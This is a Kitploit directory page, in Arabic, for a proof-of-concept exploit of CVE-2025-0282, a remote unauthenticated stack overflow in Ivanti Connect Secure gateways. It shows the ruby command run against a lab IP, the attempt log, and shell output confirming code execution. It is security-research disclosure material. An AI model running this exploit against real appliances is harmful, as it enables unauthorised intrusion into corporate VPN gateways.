Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-0282 — PoC لـ CVE-2025-0282: ثغرة تجاوز سعة المخزن المؤقت المستندة إلى المكدس، تُستغل عن بُعد ودون مصادقة، وتؤثر على Ivanti Connect Secure و Ivanti Policy Secure وبوابات Ivanti Neurons لـ ZTA | Kitploit
أدوات/GitHubGitHub/sfewer-r7/cve-2025-0282
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأداة الوصول عن بعدتطوير الحمولاتاستغلال الملفات الثنائية
GitHubsfewer-r7/cve-2025-0282

CVE-2025-0282

PoC لـ CVE-2025-0282: ثغرة تجاوز سعة المخزن المؤقت المستندة إلى المكدس، تُستغل عن بُعد ودون مصادقة، وتؤثر على Ivanti Connect Secure و Ivanti Policy Secure وبوابات Ivanti Neurons لـ ZTA

عرض المستودع
50118منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC لـ CVE-2025-0282

تجاوز سعة مخزن مؤقت قائم على المكدس عن بُعد دون مصادقة يؤثر على Ivanti Connect Secure وIvanti Policy Secure وبوابات Ivanti Neurons لـ ZTA

نظرة عامة

هذا استغلال برهان مفهوم لإظهار استغلال CVE-2025-0282، ويستند إلى استراتيجية الاستغلال التي نشرتها watchTowr.

يحتوي هذا الـ PoC على سلسلة ROP مبنية لاستهداف Ivanti Connect Secure 22.7r2.4. لا يمكن استهداف أي إصدار آخر دون بناء سلسلة ROP المقابلة لهذا الإصدار أولاً.

يحتوي هذا الـ PoC على حمولة تنفذ أمر نظام تشغيل لإنشاء ملف مؤقت على النظام المستهدف. وبهذا تعرف أن الاستغلال نجح. يتم تحقيق تنفيذ الكود بصلاحيات المستخدم غير الجذر nr.

الاستخدام

يمكننا تشغيل هذا السكربت ضد هدف Ivanti Connect Secure المعرض للخطر، الإصدار 22.7r2.4 كما يلي:

C:\Users\sfewer\Desktop\CVE-2025-0282>ruby CVE-2025-0282.rb -t 192.168.86.111 -p 443
[+] Targeting 192.168.86.111:443
[+] Detected version 22.7.2.3597
[2025-01-16 14:39:56 +0000] Starting...
[2025-01-16 14:39:56 +0000] Triggering #1...
[2025-01-16 14:39:57 +0000] Triggering #2...
[2025-01-16 14:40:08 +0000] Triggering #3...
[2025-01-16 14:40:19 +0000] Triggering #4...
[2025-01-16 14:40:30 +0000] Triggering #5...

...snip...

[2025-01-16 15:13:28 +0000] Triggering #188...
[2025-01-16 15:13:38 +0000] Triggering #189...
[2025-01-16 15:13:49 +0000] Triggering #190...
[2025-01-16 15:14:00 +0000] Triggering #191...

إذا نجح الاستغلال، فسيكتب ملفًا جديدًا إلى دليل المؤقت /var/tmp/، مع قيمة رقمية تقابل رقم محاولة الاستغلال كجزء من اسم الملف.

في صدفة جذر منفصلة على الجهاز المستهدف (والتي أنشأناها عبر كسر قيود الجهاز)، يمكننا ملاحظة متى نجح الاستغلال:

bash-4.2# ls -al /var/tmp/hax*
ls -al /var/tmp/hax*
ls: cannot access /var/tmp/hax*: No such file or directory
bash-4.2# ls -al /var/tmp/hax*
ls -al /var/tmp/hax*
-rw-r--r-- 1 nr nr 0 Jan 16 07:10 /var/tmp/haxor_191
bash-4.2#

يمكننا أن نرى من هذا المثال أن الاستغلال قام بـ 190 محاولة فاشلة، ونجح في المحاولة 191. إذن في هذا المثال، نجح استغلال هذا الهدف في 34 دقيقة.

تنزيل الأداة